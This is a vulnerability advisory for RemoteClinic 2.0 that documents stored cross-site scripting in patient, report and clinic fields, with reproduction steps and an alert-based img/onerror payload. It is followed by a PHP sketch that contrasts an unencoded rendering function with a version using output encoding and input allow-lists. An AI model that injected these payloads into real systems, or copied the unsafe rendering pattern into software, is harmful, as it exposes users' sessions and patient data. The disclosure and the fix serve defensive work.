RemoteClinic 2.0 Cross Site Scripting

  • RemoteClinic version 2.0 suffers from multiple persistent cross site scripting vulnerabilities.
    MD5 | 595ad2c6469d900f430693ecfc6768cb

    # Exploit Title: RemoteClinic 2.0 - 'Multiple' Stored Cross-Site Scripting (XSS)  
    # Date: 13/04/2021  
    # Exploit Author: Saud Ahmad  
    # Vendor Homepage: https://remoteclinic.io/  
    # Software Link: https://github.com/remoteclinic/RemoteClinic  
    # Version: 2.0  
    # Tested on: Windows 10  
    # CVE : CVE-2021-30030, CVE-2021-30034, CVE-2021-30039, CVE-2021-30042  
    # Steps to Reproduce:
    1) Log in to the application as Doctor.
    2) Register a patient with the XSS payload in the Full Name field: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>
    3) After registering the patient, go to the "Patients" endpoint.
    4) XSS executed.
    For detailed PoC: https://github.com/remoteclinic/RemoteClinic/issues/1
    # Steps to Reproduce:
    1) Log in to the application as Doctor.
    2) Register a patient.
    3) After registering the patient, the page redirects to the Register Report page.
    4) Here, enter the XSS payload in the "Symptoms" field: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>
    5) After registering the report, click on Home, which is the "dashboard" endpoint.
    6) XSS executed.
    For detailed PoC: https://github.com/remoteclinic/RemoteClinic/issues/5
    # Steps to Reproduce:
    1) Log in to the application as Doctor.
    2) Register a patient.
    3) After registering the patient, the page redirects to the Register Report page.
    4) When you scroll down the page, there are two fields, "Fever" and "Blood Pressure"; both are vulnerable to XSS. Inject the XSS payload in both fields: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>
    5) After registering the report, click on Home.
    6) Now click on Report; XSS executed.
    For detailed PoC: https://github.com/remoteclinic/RemoteClinic/issues/8
    # Steps to Reproduce:
    1) Log in to the application as Doctor.
    2) Register a new clinic.
    3) Here there are four fields: "Clinic Name", "Clinic Address", "Clinic City" and "Clinic Contact". All are vulnerable to XSS.
    4) Inject the XSS payload in all fields: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>
    5) Now go to Clinic Directory.
    6) Click on that clinic.
    7) XSS executed.
    For detailed PoC: https://github.com/remoteclinic/RemoteClinic/issues/11
    

    Source: packetstormsecurity.com
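
All four findings are stored values written back into HTML without encoding, so the fix is the same at every sink. The PHP sketch below is an added example, not RemoteClinic's code or the advisory author's; the function names, the markup and the accepted formats for "Fever" and "Blood Pressure" are assumptions.

```php
<?php
// Added illustration, not RemoteClinic source: all names and markup are hypothetical.

// Encode a stored value for HTML element and quoted-attribute contexts at output time.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern: the stored name is concatenated into an attribute and a cell.
function renderPatientRowUnsafe(string $name): string
{
    return '<tr><td><input name="full_name" value="' . $name . '"></td><td>' . $name . '</td></tr>';
}

// Hardened pattern: same markup, every dynamic value passes through e().
function renderPatientRowSafe(string $name): string
{
    return '<tr><td><input name="full_name" value="' . e($name) . '"></td><td>' . e($name) . '</td></tr>';
}

// Input-side allow-lists for the report fields (assumed formats: "101.5" and "120/80").
function isValidFever(string $v): bool
{
    return preg_match('/^\d{2,3}(\.\d)?$/D', $v) === 1;
}

function isValidBloodPressure(string $v): bool
{
    return preg_match('/^\d{2,3}\/\d{2,3}$/D', $v) === 1;
}

// Constructed sample: the value the advisory places in each vulnerable field.
$stored = 'XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>';

$checks = [
    'unsafe output contains injected element'  => strpos(renderPatientRowUnsafe($stored), '<img') !== false,
    'safe output contains no injected element' => strpos(renderPatientRowSafe($stored), '<img') === false,
    'safe output keeps the attribute closed'   => strpos(renderPatientRowSafe($stored), '&quot;&gt;') !== false,
    'payload rejected as Fever'                => !isValidFever($stored),
    'payload rejected as Blood Pressure'       => !isValidBloodPressure($stored),
    'normal readings accepted'                 => isValidFever('101.5') && isValidBloodPressure('120/80'),
];

foreach ($checks as $label => $ok) {
    echo ($ok ? 'PASS' : 'FAIL') . "  $label\n";
}
```

Output encoding is the actual fix, because free-text fields such as "Symptoms" or "Clinic Address" cannot be allow-listed; the input checks only narrow what the structured fields will store.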
